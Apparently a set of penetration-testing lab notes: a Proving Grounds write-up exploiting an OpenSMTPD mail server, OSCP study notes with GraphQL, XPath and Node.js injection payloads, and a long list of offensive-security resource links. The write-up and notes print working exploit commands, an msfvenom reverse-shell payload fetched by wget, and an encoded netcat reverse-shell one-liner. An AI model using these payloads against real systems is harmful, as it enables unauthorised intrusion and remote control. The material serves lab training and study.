``` ## OS ### Nmap OS Discovery Scan ```bash sudo nmap $TARGET -O -oN scans/$NAME-nmap-os # output Nmap scan report for 192.168.132.71 Host is up (0.077s latency). Not shown: 995 filtered ports PORT STATE SERVICE 22/tcp open ssh 25/tcp open smtp 53/tcp closed domain 80/tcp open http 445/tcp open microsoft-ds Aggressive OS guesses: Linux 2.6.32 (88%), Linux 2.6.32 or 3.10 (88%), Linux 3.5 (88%), Linux 4.2 (88%), Linux 4.4 (88%), Synology DiskStation Manager 5.1 (88%), WatchGuard Fireware 11.8 (88%), Linux 2.6.35 (87%), Linux 2.6.39 (87%), Linux 3.10 - 3.12 (87%) No exact OS matches for host (test conditions non-ideal). OS detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Jul 3 11:10:14 2021 -- 1 IP address (1 host up) scanned in 12.54 seconds ``` ### Nmap OS Discovery Scan via SMB ```bash sudo nmap $TARGET -p445 --script smb-os-discovery -oN scans/$NAME-nmap-os-smb # output nmap scan report for 192.168.132.71 Host is up (0.075s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-os-discovery: | OS: Windows 6.1 (Samba 4.7.6-Ubuntu) | Computer name: bratarina | NetBIOS computer name: BRATARINA\x00 | Domain name: \x00 | FQDN: bratarina |_ System time: 2021-07-03T11:11:28-04:00 # Nmap done at Sat Jul 3 11:11:30 2021 -- 1 IP address (1 host up) scanned in 3.28 seconds ``` # Exploit ## CVE-2020-7247 ### EDB-ID-47984 This works! ```bash searchsploit opensmtpd mkdir edb-id-47984 cd edb-id-47984 searchsploit -m 47984 # this works! sudo tcpdump -i tun0 icmp python 47984.py 192.168.141.71 25 'ping -c2 192.168.49.141' # this works! msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.49.141 LPORT=443 -f elf -o rshell sudo nc -nvlp 443 # walkthrough uses TCP port 445 sudo python3 -m http.server 80 python3 47984.py 192.168.141.71 25 'wget 192.168.49.141/rshell -O /tmp/rshell' python3 47984.py 192.168.141.71 25 'chmod +x /tmp/shell' python3 47984.py 192.168.141.71 25 '/tmp/shell' ifconfig -a && hostname && whoami ``` ### Metasploit This works! ```bash sudo msfconsole search opensmtpd exploit/unix/smtp/opensmtpd_mail_from_rce set RHOST 192.168.141.71 set LHOST tun0 set LPORT 25 run ifconfig -a && hostname && whoami ``` # Lessons Learned * Search Exploit-DB using a traditional, GUI web browser in addition to what is found via Searchsploit. * Prioritize exploits where the exploit has been confirmed by OffSec and the vulnerable software is available for download. * You probably found the right exploit if the target is running a relevant service version.
### Proving Grounds Writeups - AD:Heist, Hutch, Vault, Resourced - BOF:Malbec - WordPress:SunsetMidnight - SQLi:Butch - LibreOffice:Hepet, Craft - SeImpersonatePrivilege:Craft - container:Sirol #### Exploits - [WordPress Core < 5.2.3](https://www.exploit-db.com/exploits/47690) - [XAMPP 7.4.3 - Local Privilege Escalation](https://www.exploit-db.com/exploits/50337) - [PHP 8.1.0 RCE](https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py) - [Apache HTTP Server 2.4.49 & 2.4.50 RCE](https://www.exploit-db.com/exploits/50383) - [MariaDB 10.2 < 10.2.37, 10.3 < 10.3.28, 10.4 < 10.4.18, and 10.5 < 10.5.9, CVE-2021-27928](https://www.exploit-db.com/exploits/49765) #### Notes - When we are unable to obtain a normal response from a remote service using Telnet, it is worth trying Netcat instead. - Note the directory traversal status code ```401```. A page exists that just needs to be verified. - Check to see whether the site is enabled for both ```http``` and ```https``` services. - If database brute-force attack with Hydra triggers ```max_connect_errors``` error. (mysql> show variables like '%[max_connect_errors](https://dev.mysql.com/doc/refman/5.6/en/server-system-variables.html#sysvar_max_connect_errors)%';)[(*understanding max_connect_errors*)](https://www.virtual-dba.com/blog/mysql-max-connect-errors/) - [SQLi(manually)](https://github.com/tedchen0001/OSCP-Notes/blob/master/SQLi(manually).md) - If the site is encrypted, check the ```DNS name``` in the ```certificate``` through browser. - linpeas: ```Unknown SUID binary``` - Note that the site's upload folder may be writable. - Check the active ports and using curl to check the service. [frp](https://github.com/fatedier/frp):frpc for target, frps for attacker. - Check the unknown SUID binaries execution result. - If the target server does not install mysql client tool try using mysqldump. - Note that the root folder is accessible through a vulnerability and can be placed SSH public key. - [Bypass](https://vk9-sec.com/bypass-30x-redirect-with-burpsuite/) HTTP 30X. - If you already have root privileges, note whether you can escape environment, e.g., docker. - Note the ```opt``` folder. - Symbolic links(Symlinks) can be abused to cause elevation of privilege. - Note the ```tasks``` scheduled using ```system timers``` (command:systemctl list-timers, services location:/etc/systemd/system/). - The ```/etc/sudoers``` file controls who can run what commands as what users on what machines and can also control special things such as whether you need a password for particular commands (https://help.ubuntu.com/community/Sudoers). - Note that sending test command between different OS when we using poc exploit. - Note that when we use the exploit test command between different operating systems such as ```id``` and ```whoami```. (You may have found the right exploit but used the wrong test command.) - Note the creator information in any files we download from the target, e.g., ```pdf```, ```doc```. - If it is a windows machine, check the ```Program Files``` and ```Program Files (x86)``` folder to see if additional software is installed. - Note the interesting executable file. ```ILSpy``` .NET assembly browser and decompiler. (Visual Studio Community version also supports) - Check the information dumped from the AD environment. For example, using the ```ldapdomaindump``` to get the ```domain_users.json``` file and check all the values. - Proxychains / Forwarding Ports. - To accelerate nmap scans, you can decrease the timeout duration, it's important to note that it may affect the accuracy of the results. `/etc/proxychains4.conf => tcp_read_time_out, tcp_connect_time_out` - If the ```Git repository``` exists, use the ```ls -la``` command to check all (hidden) files after downloading. ```shell git log git show <commit-id> # web folder # https://github.com/arthaud/git-dumper git-dumper http://192.168.1.100/.git <output directory> ``` - Even if we have got the contents of the website from other services such as ftp, we can still do an enumeration of the website directory to make sure that all contents have been found. Note that the file contents may not be the same either. - If the generated ```cookie``` does not work, note the system time in the VM. - You can unzip the executable file and check the files it contains. - If you want to run a file through a schedule set by another user, be careful to use a directory that the user can also access, not `tmp` folder. - We can also check the cookies of the website. - Note that some Windows exploit exe files must be run in cmd mode, not in powershell. - When using the python exploit script, note that the input parameters are case-sensitive. - `Bad Request - Invalid Hostname. HTTP Error 400. The request hostname is invalid.` you may need to provide a specific fully qualified domain name (FQDN). - If essential components are missing when running the exploit file, try compiling it on the target machine. For example, 'GLIBC_2.34' not found. - Check for any hidden directories or files, such as git. - When collecting the user list, it is possible to include administrator as well. (AD) - Note the files in the recycle bin. - Discovery of multiple web directories using multiple wordlists. ```shell for file in $(ls /usr/share/seclists/Discovery/Web-Content); do gobuster dir -u http://<target ip> -w /usr/share/seclists/Discovery/Web-Content/$file -e -k -b "404,500" -t 20 ; done ``` - Reusing Credentials. - Don't forget about Kernel Exploits. - Analyze the code files discovered during the enumeration process. - Windows Privilege Escalation is crucial. #### Commands Used in `Depreciated` GraphQL ```graphql {__schema{types{name,fields{name}}}} {listUsers} {getOTP(username:"peter")} ``` Used in `Wheels` XPATH Injection (XML data) ``` ') or 1=1 or (' ')] | //password%00 ``` Used in `ProStore` Node.js https://medium.com/r3d-buck3t/eval-console-log-rce-warning-be68e92c3090 ``` # we are conducting some tests parameter=(%32%2b%32) parameter=(%32%2b%31) parameter=require('child_process').exec('rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20192.168.x.x%2080%20%3E%2Ftmp%2Ff') ```
# Awesome-PenTest-Practice ### Tips, Materials and commands that you can use in CTFs, RealPenTest and even Bug Bounty! #### My LinkedIn: https://www.linkedin.com/in/joas-antonio-dos-santos/ >> Contains more than 170 articles by Red and Blue Team ---------------------------------------------------------------------------------------------- #### Nmap Tricks: nmap -sV -Pn --top-ports 1000 --min-rate 200 --max-rate 400 -T5 192.168.0.1/24 = High Fast Nmap Scan nmap -v -sV -T5 --top-ports 1000 --min-rate 200 --max-rate 400 --scan-delay 2 --max-scan-delay 4 --min-rtt-timeout 2 --max-rtt-timeout 3 initial-rtt-timeout 1 192.168.0.1/24 = Ultra High Fast Nmap Scan nmap --top-ports 1000 -sV -v --ttl 10 --badsum TCP -f --mtu 16 192.168.0.1/24 = Evasion Firewall nmap --top-ports 1000 -sV -v --ttl 10 -f --mtu 16 192.168.0.1/24 = Evasion Firewall 2 https://www.liquidweb.com/kb/using-nmap-pro-tips-and-tricks/ https://blog.urfix.com/10-cool-nmap-tricks-techniques/ https://medium.com/@iphelix/nmap-scanning-tips-and-tricks-5b4a3d2151b3 ---------------------------------------------------------------------------------------------- #### Nmap Evasion Techniques: http://www.dimz-it.com/berkas/Nmap_Firewall_Evasion_Techniques.pdf https://nmap.org/book/firewall-subversion.html https://dzone.com/articles/firewall-bypassing-techniques-with-nmap-and-hping3 https://www.youtube.com/watch?v=d5-wBkMRPQU (Hak5 Evade Firewall) https://www.youtube.com/watch?v=4t4kBkMsDbQ&ab_channel=NetworkChuck (Network Chuck Nmap) https://github.com/jasonniebauer/Nmap-Cheatsheet ---------------------------------------------------------------------------------------------- #### Bug Bounty Tricks and Techniques: https://github.com/KingOfBugbounty/KingOfBugBountyTips https://github.com/djadmin/awesome-bug-bounty https://github.com/Muhammd/awesome-bug-bounty https://github.com/ngalongc/bug-bounty-reference https://github.com/djadmin/awesome-bug-bounty https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters https://github.com/EdOverflow/bugbounty-cheatsheet https://github.com/EdOverflow/bugbountyguide https://github.com/devanshbatham/Awesome-Bugbounty-Writeups https://github.com/1hack0/Facebook-Bug-Bounty-Write-ups https://pentester.land/list-of-bug-bounty-writeups.html https://medium.com/bugbountywriteup CSRF Poc Generator (https://github.com/merttasci/csrf-poc-generator) SubOver (https://github.com/Ice3man543/SubOver) Knock SubDomain (https://github.com/guelfoweb/knock) XSS Payloads (https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec) SQL Injection Payloads (https://github.com/payloadbox/sql-injection-payload-list) Trick Recon (https://www.linkedin.com/pulse/tricks-de-recon-ataide-junior/?trackingId=lo%2FwG4h%2FSemwGplcWrHIhA%3D%3D) ---------------------------------------------------------------------------------------------- #### Red Team - Tools and Techniques https://github.com/infosecn1nja/Red-Teaming-Toolkit https://github.com/yeyintminthuhtut/Awesome-Red-Teaming https://github.com/m0nad/awesome-privilege-escalation https://github.com/D35m0nd142/LFISuite https://github.com/P0cL4bs/kadimus.git https://github.com/MrPineMan/Awesome-Reverse-Shell https://github.com/xl7dev/WebShell https://portswigger.net/web-security https://github.com/alphaSeclab/awesome-burp-suite https://github.com/snoopysecurity/awesome-burp-extensions https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html https://sushant747.gitbooks.io/total-oscp-guide/list_of_common_ports.html https://github.com/jakejarvis/awesome-shodan-queries https://github.com/danielmiessler/SecLists https://github.com/0x4D31/awesome-oscp https://github.com/Aadi-0110/awesome-oscp https://github.com/coolx28/Awesome-Oscp https://github.com/JoaoPauloF/OSCP/blob/master/OSCPnotes.md https://github.com/husnainfareed/Awesome-Ethical-Hacking-Resources https://github.com/codeinthedark/awesome-power-mode/commits?author=ceh https://github.com/Optixal/CEHv10-Notes https://github.com/g0rbe/CEH https://github.com/CyberSecurityUP/Guide-CEH-Practical-Master https://docs.google.com/document/d/e/2PACX-1vTP5OvJToWToMOKyeMyPcIPJhqbnESgWY6dYje9seJY96-ezCEJbXsMkfMWhoqPRaCNRs6BOO7urQyF/pub?fbclid=IwAR3aWZoikOvDgfxxzdfjFsGS60Q9SE8ZL5ROqP6Bzvzuq-fIYbSGoxRjArY https://drive.google.com/drive/folders/12Mvq6kE2HJDwN2CZhEGWizyWt87YunkU (e-books Joas) https://www.exploit-db.com/google-hacking-database https://iftm.edu.br/ERP/MPES/EVENTOS/arquivos/2015_10_16-09_20_01_anexo_resumo_expandido_bruno_rodrigo.pdf https://www.youtube.com/watch?v=LgBcFpusC7A https://www.blackhat.com/presentations/bh-europe-05/BH_EU_05-Long.pdf https://www.oakton.edu/user/2/rjtaylor/cis101/Google%20Hacking%20101.pdf https://www.a2hosting.com.br/kb/getting-started-guide/internet-and-networking/troubleshooting-dns-with-dig-and-nslookup https://ipok.com.br/blog/usando-dig-para-pesquisas-de-dns-parte-1/ https://www.cloudns.net/blog/10-most-used-nslookup-commands/ https://www.somosagility.com.br/como-solucionar-problemas-de-dns-com-dig-e-nslookup-2/ https://www.youtube.com/watch?v=2KzpGjn7M9s https://github.com/rebootuser/LinEnum https://github.com/Arr0way/linux-local-enumeration- https://highon.coffee/blog/linux-local-enumeration-/ https://github.com/Z3R0th-13/Enum https://github.com/411Hall/JAWS https://411hall.github.io/JAWS-Enumeration/ https://hakin9.org/privesccheck-privilege-escalation-enumeration--for-windows/ http://literacybasics.ca/strategic-planning/strategic-planning-assesssment/overview-and-information-gathering-tools/ https://www.dlsweb.rmit.edu.au/Toolbox/knowmang/content/gathering_data/information_gathering_methods.htm https://www.youtube.com/watch?v=WW6myutKBYk https://www.youtube.com/watch?v=zemNLx0-LRw https://www.youtube.com/watch?v=xlxpfvlUZLA https://www.youtube.com/watch?v=Q8hAjEaAgE8 https://www.youtube.com/watch?v=z2EUhV11QB4 https://www.youtube.com/watch?v=Hk-21p2m8YY https://www.youtube.com/watch?v=GlVb44dD-dA https://www.youtube.com/watch?v=7XMIFTRiAGA https://null-byte.wonderhowto.com/how-to/hack-like-pro-advanced-nmap-for-reconnaissance-0151619/ https://www.youtube.com/watch?v=krnpQWDkf_c https://hackertarget.com/nmap-tutorial/ https://www.youtube.com/watch?v=VFJLMOk6daQ https://awesomeopensource.com/projects/information-gathering https://github.com/topics/information-gathering https://www.hindawi.com/journals/scn/2019/2627608/ https://www.researchgate.net/publication/328430317_Approaches_for_Preventing_Honeypot_Detection_and_Compromise https://blog.rapid7.com/2016/12/06/introduction-to-honeypots/ https://ccdcoe.org/uploads/2018/10/d3r2s4_haltas.pdf https://www.incibe-cert.es/en/blog/honeystation-en https://www.youtube.com/watch?v=fQqWe8br2Gw https://securityonline.info/adrecon-active-directory-gathering-information-tool/ https://www.youtube.com/watch?v=ze1UcSLOypwMitre Attack Discoverys https://attack.mitre.org/techniques/T1010/ https://attack.mitre.org/techniques/T1046/ https://attack.mitre.org/techniques/T1007/ https://attack.mitre.org/techniques/T1033/ https://attack.mitre.org/techniques/T1049/ https://attack.mitre.org/techniques/T1063/ https://attack.mitre.org/techniques/T1018/ https://attack.mitre.org/techniques/T1069/ https://attack.mitre.org/techniques/T1201/ https://attack.mitre.org/matrices/enterprise/linux/ Wsus Exploit: Realizar movimento lateral e manipular componentes do WSUS https://pentestit.com/wsuxploit-weaponized-wsus-exploit-/ https://github.com/AlsidOfficial/WSUSpendu https://osiriansec.gitbooks.io/infosecuberwiki/chapter1/exploitation/internal/lan-attacks/attack-windows/attack-wsus.html https://github.com/infosecn1nja/AD-Attack-Defense/blob/master/README.md Linux Exploitation: Exploraรงรฃo avanรงadas, mรฉtodos de enumeraรงรฃo avanรงada, escalaรงรฃo de privilรฉgio, pivoting e atรฉ exploraรงรฃo de serviรงos. https://attack.mitre.org/techniques/T1184/ https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ https://www.youtube.com/watch?v=dk2wsyFiosg https://tools.kali.org/tools-listing https://www.youtube.com/watch?v=SyE4y6qZPjM https://www.youtube.com/watch?v=B2xu0QXXx54 https://www.youtube.com/watch?v=SjwjxQndOs8 https://www.youtube.com/watch?v=_wdESwXdMYg https://www.youtube.com/watch?v=sZ_-KD5Dksw https://www.youtube.com/watch?v=gsEvrdcn-DI https://kalilinuxtutorials.com/infog-information-gathering-tool/ https://www.hackingloops.com/information-gathering-using-kali-linux-for-penetration-testing/ https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md https://medium.com/@aptbughunter/my-oscp-experience-0xapt-4fff90a8d408 https://www.offensivecon.org/trainings/2018/linux-kernel-exploitation-techniques-vitaly-nikolenko.html https://github.com/xairy/linux-kernel-exploitation/blob/master/README.md https://github.com/xairy/linux-kernel-exploitation https://www.youtube.com/watch?v=Hrlc3GZQ4bA https://artkond.com/2017/03/23/pivoting-guide/ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md https://resources.infosecinstitute.com/pivoting-exploit-system-another-network/#gref https://gtfobins.github.io/ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md https://payatu.com/guide-linux-privilege-escalation https://medium.com/@falconspy/oscp-approved-tools-b2b4e889e707 https://null-byte.wonderhowto.com/how-to/use-ssh-local-port-forwarding-pivot-into-restricted-networks-0179711/ https://www.cybrary.it/blog/0p3n/pivot-network-port-forwardingredirection-hands-look/ https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html https://www.youtube.com/watch?v=mQ1hRS8scWM Windows Exploitation:Vulnerability scanning, pivoting and sideways movement, password cracking and privilege escalation https://github.com/yeyintminthuhtut/Awesome-Advanced-Windows-Exploitation-References https://hackersguru.in/windows-exploitation-and-hacking/ https://pt.slideshare.net/utdcsg/advanced-windows-exploitation https://www.offensive-security.com/offsec/microsoft-dll-hijacking-exploit-in-action/ https://www.youtube.com/watch?v=Pt9a6EQFs9s https://www.youtube.com/watch?v=XR1F467LTrs https://www.youtube.com/watch?v=2-kJ7Kh_5C4 https://www.youtube.com/watch?v=FJhVoXwoX_w https://doublepulsar.com/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6 https://www.youtube.com/watch?v=keFx6yYA_WY Mitre Attack: https://attack.mitre.org/matrices/enterprise/windows/ https://attack.mitre.org/techniques/T1077/ https://attack.mitre.org/techniques/T1111/ https://attack.mitre.org/techniques/T1174/ https://attack.mitre.org/techniques/T1534/ https://attack.mitre.org/techniques/T1175/ https://attack.mitre.org/techniques/T1075/ https://github.com/gentilkiwi/mimikatz https://www.varonis.com/blog/what-is-mimikatz/ https://www.youtube.com/watch?v=bTYR_xYSDIk https://www.youtube.com/watch?v=0TBCzaBklcE https://www.youtube.com/watch?v=FfoQFKhWUr0 https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html https://osandamalith.com/2019/08/26/converting-an-exe-to-a-dll/?fbclid=IwAR2LtVQnTJy-0M4cM9sEWTydKOSGIiGI9wiqKlD4V33Wtl6mWyd8hlNnBXo Desenvolvimento de exploits: Buffer Overflow, Bypass Software Protectors, Binary Exploitation, ROP, Shell codes, Fuzzing, Reverse Engineering, Egg Hunters, Debuggers and etc. https://www.youtube.com/watch?v=iyAyN3GFM7A&list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN https://github.com/FabioBaroni/awesome-exploit-development https://github.com/mxamusic/awesome-exploit-development https://www.youtube.com/watch?v=1S0aBV-Waeo&t=1s https://www.youtube.com/watch?v=1TNecxUBD1w https://www.youtube.com/watch?v=H2ZTTQX-ma4 https://www.youtube.com/watch?v=59_gjX2HxyA https://www.youtube.com/watch?v=hrjdAv-aHCY https://www.youtube.com/watch?v=VX27nq6EcjI&list=PLcKsaFvYl4l87C8_HhxkcFaoNhzC9bRw6 https://www.youtube.com/channel/UCXHBFtUcbhIssuuXXud2WcQ https://www.youtube.com/watch?v=8Dcj19KGKWM https://www.youtube.com/watch?v=wDosab_Y4Hs https://www.youtube.com/watch?v=5FJxC59hMRY https://www.youtube.com/watch?v=gIJOtP1AC3A&t=9s https://www.youtube.com/watch?v=4_xSGvD0GNk https://www.youtube.com/watch?v=6JBRXqT3USI https://www.youtube.com/watch?v=YgezGxzwD8A https://www.youtube.com/watch?v=7PMw9GIb8Zs&list=PLBf0hzazHTGPoP8BjixXswrM01ttNkfnp https://github.com/secfigo/Awesome-Fuzzing https://github.com/wtsxdev/fuzzing-resources https://www.hackers-arise.com/post/2017/06/21/exploit-development-part-3-finding-vulnerabilities-by-fuzzing-with-spike https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/babys-first-nxplusaslr-bypass/ https://medium.com/@dontsmokejoints/bypass-nx-and-aslr-with-rop-38a0e46a62da https://intx0x80.blogspot.com/2018/04/bypass-aslrnx-part-1.html https://www.youtube.com/watch?v=mPbHroMVepM https://www.youtube.com/watch?v=BI_fO4gMW4Q https://awesomeopensource.com/projects/shellcode https://github.com/codeengn/awesome-korea-security-paper/blob/master/ReverseEngineering/Understanding%20Windows%20Shellcode%20%5Bskape%5D.pdf https://0x00sec.org/t/linux-shellcoding-part-1-0/289 https://medium.com/@eaugusto/windows-ce-superh3-exploit-development-interlude-usable-null-free-risc-shellcode-and-ascii-3a4bbf3077bf https://www.exploit-db.com/papers/18273 https://www.exploit-db.com/shellcodes https://www.offensive-security.com/metasploit-unleashed/payloads/ https://www.offensive-security.com/metasploit-unleashed/payload-types/ https://www.youtube.com/watch?v=a2EkORFcSZo https://www.youtube.com/watch?v=Ps3mZWQz01s&list=PLIfZMtpPYFP4MaQhy_iR8uM0mJEs7P7s3 https://www.youtube.com/watch?v=RF3-qDy-xMs&list=PLIfZMtpPYFP6_YOrfX79YX79I5V6mS0ci https://medium.com/@rafaveira3/exploit-development-kolibri-v2-0-http-server-egg-hunter-example-1-5e435aa84879 https://www.fuzzysecurity.com/tutorials/expDev/4.html https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/ https://www.securitysift.com/windows-exploit-development-part-5-locating-shellcode-egghunting/ https://www.shogunlab.com/blog/2017/09/02/zdzg-windows-exploit-3.html https://securityimpact.net/2017/02/15/exploit-development-4-egg-hunting/ https://connormcgarr.github.io/Exception-Handlers-and-Egg-Hunters/ https://rastating.github.io/creating-a-custom-shellcode-encoder/ https://medium.com/syscall59/writing-a-custom-shellcode-encoder-31816e767611 https://medium.com/@habibiefaried/slae-0x4-combined-method-for-encoding-shellcode-x86-2f8637d87ed9 https://www.offensive-security.com/metasploit-unleashed/alphanumeric-shellcode/ https://www.youtube.com/watch?v=vpzpuzqhOCI https://www.youtube.com/watch?v=IMnKb3BaUvM http://www-inst.eecs.berkeley.edu/~cs161/fa08/papers/stack_smashing.pdf https://www.youtube.com/watch?v=Y-4WHf0of6Y https://pastebin.com/FvWQZmB7 https://repo.zenk-security.com/Techniques%20d.attaques%20%20.%20%20Failles/Exploit%20writing%20tutorial%20part%201-Stack%20Based%20Overflows.pdf Command and Control (C2): Command and control consists of techniques that opponents can use to communicate with systems under their control in a network of victims. Opponents usually try to mimic normal and expected traffic to avoid detection. There are many ways in which an adversary can establish command and control with varying levels of stealth, depending on the structure of the network and the victim's defenses. https://medium.com/@jeremy.trinka/five-pentesting-tools-and-techniques-that-sysadmins-should-know-about-4ceca1488bff https://attack.mitre.org/tactics/TA0011/ https://pentestit.com/list-of-open-source-c2-post-exploitation-frameworks/ https://pentestlab.blog/2017/11/14/command-and-control-website/ https://pentester.land/ https://www.youtube.com/watch?v=bUqu8fh7xUg https://www.youtube.com/watch?v=eTA7weRp2yk https://www.youtube.com/watch?v=cK16knLi1Vk https://www.youtube.com/watch?v=Wk6xobVsZf4 https://www.youtube.com/watch?v=2G5B8uhku78 https://www.youtube.com/watch?v=S_ejYRTM8J0 https://www.youtube.com/watch?v=_L-VW_1tYHA https://www.trendmicro.com/vinfo/us/security/definition/command-and-control-server https://www.paloaltonetworks.com/cyberpedia/command-and-control-explained๏ปฟ Web Attacks: Ataques avanรงados de injeรงรฃo de SQL, Comando de Sistema, Execuรงรฃo de cรณdigo remoto, deserialization, XSS impactante, SQL to RCE, XSS to RCE, Bypass File Extensions, IDOR, Open redirect e etc. Ataques que tem grande impactos em aplicaรงรตes web. https://owasp.org/www-project-top-ten/ https://github.com/infoslack/awesome-web-hacking https://github.com/latestalexey/awesome-web-hacking https://libraries.io/github/infoslack/awesome-web-hacking https://www.exploit-db.com/papers/13646 https://null-byte.wonderhowto.com/how-to/advanced-techniques-bypass-defeat-xss-filters-part-1-0190257/ https://www.youtube.com/watch?v=zs30qw4CF2U http://devfuria.com.br/seguranca-da-informacao/owasp-topten-2010/a02-cross-site-ing/ https://www.youtube.com/watch?v=T-EQfydIxu4 https://www.youtube.com/watch?v=O3hb6HV1ZQo&t https://www.youtube.com/watch?v=FTeE3OrTNoA&t=1s https://www.youtube.com/watch?v=0dgmeTy7X3I https://www.youtube.com/watch?v=L5l9lSnNMxg https://www.youtube.com/watch?v=eDfGpu3iE4Q https://github.com/pwntester/ysoserial.net https://www.youtube.com/watch?v=nkTBwbnfesQ https://medium.com/@notsoshant/a-not-so-blind-rce-with-sql-injection-13838026331e https://medium.com/bugbountywriteup/sql-injection-to-lfi-to-rce-536bed29a862 https://pwnrules.com/flickr-from-sql-injection-to-rce/ https://medium.com/@knownsec404team/the-analysis-of-mybb-18-20-from-stored-xss-to-rce-7234d7cc0e72 https://github.com/xapax/xss-to-rce https://blog.ripstech.com/2019/mybb-stored-xss-to-rce/ https://github.com/timip/OSWE https://github.com/nicolauns/hunter-php-java-obfuscator https://github.com/tholu/php-packer https://obfuscator.io/ https://medium.com/nodesimplified/obfuscation-what-is-obfuscation-in-java-why-obfuscation-is-used-f6a5f5bcf022 https://github.com/java-obfuscator/java-obfuscator https://owasp.org/www-pdf-archive/XML_Based_Attacks_-_OWASP.pdf https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870 https://www.acunetix.com/blog/articles/xml-external-entity-xxe-vulnerabilities/ https://www.netsparker.com/blog/web-security/xxe-xml-external-entity-attacks/ https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf https://pentestlab.blog/2012/11/29/bypassing-file-upload-restrictions/ https://www.youtube.com/watch?v=Ue3wtxR9s0E https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload https://github.com/attackercan/REGEXP-SECURITY-CHEATSHEET https://nvisium.com/blog/2015/06/11/regex-regularly-exploitable.html https://medium.com/@somdevsangwan/exploiting-regular-expressions-2192dbbd6936 https://portswigger.net/support/sql-injection-bypassing-common-filters https://owasp.org/www-community/attacks/Session_hijacking_attack https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html https://www.youtube.com/watch?v=fxrCJNQ96Kg https://www.youtube.com/watch?v=OtlaTf9065w https://www.youtube.com/watch?v=jYcx7WtbB0A https://www.geeksforgeeks.org/session-hijacking/ https://www.venafi.com/blog/what-session-hijacking https://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf https://cheatsheetseries.owasp.org/cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html https://www.youtube.com/watch?v=iUbqJy_MOiE https://www.youtube.com/watch?v=DkKUDbEt46A https://www.youtube.com/watch?v=Bdpc-LjmKLc https://portswigger.net/kb/issues/00100500_ldap-injection https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/ https://websec.files.wordpress.com/2010/11/sqli2.pdf https://medium.com/@Pentestit_ru/bypassing-waf-4cfa1aad16bf https://owasp.org/www-pdf-archive/OWASP_Stammtisch_Frankfurt_-_Web_Application_Firewall_Bypassing_-_how_to_defeat_the_blue_team_-_2015.10.29.pdf https://www.youtube.com/watch?v=iQqwQXHwQk0 https://www.youtube.com/watch?v=Z8K_13jzITk https://www.youtube.com/watch?v=tSf_IXfuzXk https://www.youtube.com/watch?v=3K1-a7dnA60&t https://www.youtube.com/watch?v=rloqMGcPMkI https://www.youtube.com/watch?v=4Jk_I-cw4WE https://www.youtube.com/watch?v=-nOih7rolX8 https://www.youtube.com/watch?v=HZaYmeOGCmI&list=PLy8t3TIwSh3tMEAjyldNNbjtTmm5G7kFl https://www.linkedin.com/pulse/t%C3%A9cnica-anti-forenses-para-pentesters-1-b%C3%A1sicas-dos-santos/ https://pentester.land/list-of-bug-bounty-writeups.html https://www.facebook.com/ExWareLabs/ https://twitter.com/hashtag/bugbountywriteup https://medium.com/search?q=bug%20bounty https://github.com/infoslack/awesome-web-hacking https://github.com/latestalexey/awesome-web-hacking https://awesomeopensource.com/project/infoslack/awesome-web-hacking https://owasp.org/www-project-top-ten/ https://owasp.org/www-project-mobile-top-10/ https://github.com/vaib25vicky/awesome-mobile-security https://www.youtube.com/results?search_query=mobile+hacking https://www.linkedin.com/search/results/content/?keywords=web%20attacks%20joas&origin=SWITCH_SEARCH_VERTICAL https://www.linkedin.com/pulse/bug-bounty-como-se-tornar-um-especialista-em-ataques-web-dos-santos/ https://www.linkedin.com/pulse/advanced-web-attacks-joas-antonio-dos-santos/ https://www.linkedin.com/pulse/overview-da-certifica%C3%A7%C3%A3o-ewpt-elearning-web-tester-dos-santos/ https://www.linkedin.com/pulse/overview-da-certifica%C3%A7%C3%A3o-offensive-security-web-oswe-dos-santos/ https://www.linkedin.com/pulse/como-se-tornar-um-elliot-alderson-do-ctf-pt2-joas-antonio-dos-santos/ https://github.com/b1n4ry4rms/RedTeam-Pentest-Cheatsheets/tree/master/OSCE https://tulpa-security.com/2017/07/18/288/ https://jhalon.github.io/OSCE-Review/ https://drive.google.com/drive/folders/12Mvq6kE2HJDwN2CZhEGWizyWt87YunkU (My Ebooks) https://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/ https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-1-is-oscp-for-you-b57cbcce7440 https://www.offensive-security.com/offsec/my-philosophical-approach-to-oscp/ https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection https://github.com/payloadbox/xss-payload-list https://medium.com/@pravinponnusamy/xss-payloads-7079c53c8559 https://owasp.org/www-community/xss-filter-evasion-cheatsheet https://twitter.com/xsspayloads 